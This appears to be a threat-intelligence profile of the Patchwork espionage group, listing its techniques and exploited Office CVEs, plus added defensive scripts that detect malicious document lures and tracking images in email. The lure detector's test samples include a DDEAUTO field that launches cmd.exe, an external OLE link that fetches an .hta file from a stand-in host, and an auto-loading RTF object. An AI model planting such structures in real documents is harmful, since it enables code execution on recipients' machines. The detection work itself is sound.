Patchwork is a cyberespionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Patchwork has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.    
Associated Group Descriptions

|Name|Description|
|---|---|
|Dropping Elephant| |
|MONSOON|MONSOON is the name of an espionage campaign; it is used here to refer to the actor group behind the campaign.|
|Operation Hangover|It is believed that the actors behind G0040 are the same actors behind Operation Hangover.|
Techniques Used

|Domain|ID|Name|Use|
|---|---|---|---|
|Enterprise|T1088|Bypass User Account Control| |
|Enterprise|T1005|Data from Local System|Patchwork developed a file stealer that searches C:\ and collects files with certain extensions. Patchwork also executed a script that enumerates all drives, stores them as a list, and uploads the generated files to the C2 server.|
|Enterprise|T1173|Dynamic Data Exchange| |
|Enterprise|T1203|Exploitation for Client Execution|Patchwork uses malicious documents to deliver remote code execution exploits. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, and CVE-2015-1641, all Microsoft Office or Windows OLE vulnerabilities triggered by opening a crafted document.|
|Enterprise|T1083|File and Directory Discovery| |
|Enterprise|T1066|Indicator Removal from Tools| |
|Enterprise|T1027|Obfuscated Files or Information| |
|Enterprise|T1060|Registry Run Keys / Startup Folder| |
|Enterprise|T1076|Remote Desktop Protocol| |
|Enterprise|T1105|Remote File Copy| |
|Enterprise|T1063|Security Software Discovery| |
|Enterprise|T1192|Spearphishing Link|Patchwork has used spearphishing with links to deliver files with exploits to initial victims. The group has embedded image tags (web bugs) with unique, per-recipient tracking links in its emails to identify which recipients opened the messages.|
|Enterprise|T1082|System Information Discovery|Patchwork collected the victim computer name, OS version, and architecture type and sent the information to its C2 server. Patchwork also enumerated all available drives on the victim's machine.|
|Enterprise|T1033|System Owner/User Discovery| |
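The document-delivery techniques in the table (T1173 and T1203) leave structural markers inside the lure file that can be triaged mechanically before detonation. The script below is an added example for this page; it is not Patchwork tooling and not code from ATT&CK or from the cited reports. It looks for an OOXML relationship to an external OLE object (the CVE-2017-0199 pattern), a DDE field code in the document body, and an embedded OLE object in RTF. The relationship type URI, the Word field-code layout and the RTF control words are taken from the public Office and RTF formats; the sample documents, the example.invalid host, the `scan*` function names and the use of `calc.exe` in the DDE sample are constructed for the example, and the checks are coarse triage heuristics rather than a parser.

```python
"""Triage of document lures using the delivery tricks listed in the table.

Added example (not Patchwork tooling, not code from the ATT&CK page).
It flags three things an analyst checks in a suspicious Office file:
  * an OOXML relationship to an external OLE object, the CVE-2017-0199
    pattern (oleObject relationship with TargetMode="External");
  * a DDE / DDEAUTO field code in word/document.xml (T1173);
  * an RTF carrying an embedded OLE object (\\object ... \\objdata), the
    container used by RTF-based exploits; \\objupdate is noted because it
    forces the object to load when the file is opened.
The sample documents are constructed in memory so the script runs offline.
"""
import io
import re
import zipfile

OLE_REL = "relationships/oleObject"          # suffix of the OLE relationship type URI
REL_TAG_RE = re.compile(r"<Relationship\b[^>]*/?>")
TARGET_RE = re.compile(r'Target="([^"]*)"')
DDE_RE = re.compile(r"\bDDE(AUTO)?\b", re.IGNORECASE)


def scan_ooxml(data: bytes) -> list[str]:
    """Inspect a .docx/.xlsx/.pptx zip for external OLE links and DDE fields."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.endswith(".rels"):
                for tag in REL_TAG_RE.findall(z.read(name).decode("utf-8", "replace")):
                    if OLE_REL in tag and 'TargetMode="External"' in tag:
                        m = TARGET_RE.search(tag)
                        findings.append(f"external OLE link in {name} -> {m.group(1) if m else '?'}")
            elif name.endswith("document.xml"):
                # Search the raw XML: Word may split the field text across several
                # <w:instrText> runs or keep it in a fldSimple attribute; both survive here.
                if DDE_RE.search(z.read(name).decode("utf-8", "replace")):
                    findings.append(f"DDE field code in {name}")
    return findings


def scan_rtf(data: bytes) -> list[str]:
    """Inspect an RTF file for embedded OLE objects."""
    findings = []
    if re.search(rb"\\object\b", data) and re.search(rb"\\objdata\b", data):
        cls = re.search(rb"\\objclass\s*([A-Za-z0-9._]+)", data)
        findings.append("embedded OLE object" + (f" ({cls.group(1).decode()})" if cls else ""))
        if re.search(rb"\\objupdate\b", data):
            findings.append("\\objupdate: object is loaded automatically on open")
    return findings


def scan(data: bytes) -> list[str]:
    """Dispatch on the container magic; anything else is reported, not guessed."""
    if data.startswith(b"PK\x03\x04"):
        return scan_ooxml(data)
    if data.startswith(b"{\\rtf"):
        return scan_rtf(data)
    return ["unrecognised container"]


# --- constructed samples (not real malware) ---------------------------------
def build_docx(document_xml: str, rels_xml: str) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()

BENIGN_DOCX = build_docx(
    "<w:document><w:body><w:p><w:t>quarterly report</w:t></w:p></w:body></w:document>",
    '<Relationships><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
    'officeDocument/2006/relationships/styles" Target="styles.xml"/></Relationships>')

OLE_LINK_DOCX = build_docx(
    "<w:document><w:body><w:p><w:t>see attached</w:t></w:p></w:body></w:document>",
    '<Relationships><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/'
    'officeDocument/2006/relationships/oleObject" Target="http://example.invalid/u.hta" '
    'TargetMode="External"/></Relationships>')

DDE_DOCX = build_docx(
    '<w:document><w:body><w:p><w:r><w:instrText>DDE</w:instrText></w:r>'
    '<w:r><w:instrText>AUTO c:\\\\windows\\\\system32\\\\cmd.exe "/k calc.exe"</w:instrText>'
    '</w:r></w:p></w:body></w:document>',
    "<Relationships/>")

RTF_OLE = (b"{\\rtf1{\\object\\objemb\\objupdate{\\*\\objclass Package}"
           b"{\\*\\objdata 0105000002000000}}}")

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN_DOCX), ("ole-link", OLE_LINK_DOCX),
                       ("dde", DDE_DOCX), ("rtf", RTF_OLE)]:
        print(label, scan(doc) or ["clean"])
```

An external `oleObject` relationship and a DDE field are both rare in legitimate business documents, so either finding justifies holding the file; an embedded RTF object is more common and is best combined with the `\objupdate` flag and the `\objclass` value before deciding.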
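The web bugs described under T1192 are remote `<img>` references whose URL carries a token unique to each recipient, so the sender learns who rendered the mail. The script below is an added example for this page, not Patchwork code and not from ATT&CK or the cited reports. It shows two checks: per-message heuristics a mail-gateway rule would apply (remote image that is 1x1 or hidden, or whose URL carries a long high-entropy token), and a cross-message comparison that finds the image URLs which change between copies of the same lure sent to different recipients. The messages, recipients, the domains `track.example.invalid`, `cdn.example.invalid` and `thinktank.invalid`, the token strings and the 3.5-bit entropy threshold are all constructed assumptions.

```python
"""Spot per-recipient tracking images ("web bugs") in inbound HTML mail.

Added example; not Patchwork tooling and not code from the ATT&CK page.
A web bug is an <img> whose remote URL is fetched when the mail is
rendered, telling the sender who opened it and when. All messages and
domains below are constructed (example.invalid / thinktank.invalid).
"""
import email
import math
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

TOKEN_RE = re.compile(r"[A-Za-z0-9_-]{16,}")     # long path/query component


def shannon_entropy(s: str) -> float:
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))


class ImgCollector(HTMLParser):
    """Collect the attributes of every <img> tag in an HTML body."""
    def __init__(self):
        super().__init__()
        self.imgs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            self.imgs.append({k.lower(): (v or "") for k, v in attrs})


def remote_images(raw_message: bytes) -> list[dict]:
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    body = msg.get_body(preferencelist=("html",))
    if body is None:
        return []
    parser = ImgCollector()
    parser.feed(body.get_content())
    # cid: and data: images are embedded in the mail and cannot phone home
    return [a for a in parser.imgs if urlsplit(a.get("src", "")).scheme in ("http", "https")]


def is_tiny_or_hidden(attrs: dict) -> bool:
    def px(v):
        m = re.match(r"\s*(\d+)", v or "")
        return int(m.group(1)) if m else None
    w, h = px(attrs.get("width")), px(attrs.get("height"))
    style = attrs.get("style", "").replace(" ", "").lower()
    return ((w is not None and w <= 1) or (h is not None and h <= 1)
            or "display:none" in style or "visibility:hidden" in style)


def find_web_bugs(raw_message: bytes) -> list[dict]:
    """Per-message heuristics: one dict per suspicious remote image."""
    hits = []
    for attrs in remote_images(raw_message):
        u = urlsplit(attrs["src"])
        token = max(TOKEN_RE.findall(u.path + "?" + u.query), key=len, default="")
        reasons = []
        if is_tiny_or_hidden(attrs):
            reasons.append("1x1 or hidden image")
        if token and shannon_entropy(token) >= 3.5:       # assumed threshold
            reasons.append("high-entropy token in URL")
        if reasons:
            hits.append({"host": u.hostname, "src": attrs["src"], "reasons": reasons})
    return hits


def recipient_specific_images(raw_messages: list[bytes]) -> list[str]:
    """Cross-message check: hosts whose image URL differs between copies of one mail."""
    per_msg = [[a["src"] for a in remote_images(m)] for m in raw_messages]
    varying = []
    for slot in zip(*per_msg):                 # same image position in each copy
        if len(set(slot)) > 1:
            varying.append(urlsplit(slot[0]).hostname)
    return varying


# --- constructed sample: one template sent to two recipients ---------------
def build_sample(recipient: str, token: str) -> bytes:
    html = (
        '<html><body><p>Dear colleague, the attached agenda is for review.</p>'
        '<img src="https://cdn.example.invalid/logo.png" width="200" height="60">'
        f'<img src="http://track.example.invalid/o/{token}.gif" width="1" height="1">'
        '</body></html>'
    )
    return (f"From: events@example.invalid\r\nTo: {recipient}\r\nSubject: Agenda\r\n"
            "MIME-Version: 1.0\r\nContent-Type: text/html; charset=utf-8\r\n\r\n"
            + html).encode()

SAMPLES = [build_sample("a.analyst@thinktank.invalid", "u7Qm3xL9pZk2vR4tWq8N1bYc"),
           build_sample("b.fellow@thinktank.invalid", "Hs2dK8nQw4Lt7Ym1Vc6Rb3Px")]

if __name__ == "__main__":
    for hit in find_web_bugs(SAMPLES[0]):
        print(hit)
    print("varies per recipient:", recipient_specific_images(SAMPLES))
```

A single high-entropy token does not prove tracking, since a CDN cache-buster looks the same, so when several copies of a lure are available the cross-recipient comparison is the check to rely on; the per-message heuristics are what a gateway can apply to the first copy it sees.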
References

- Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.
- Hamada, J. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.
- Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.
- Meltzer, M., et al. (2018, June 7). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.
- Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.
- Levene, B., et al. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.
- Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.
- Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016.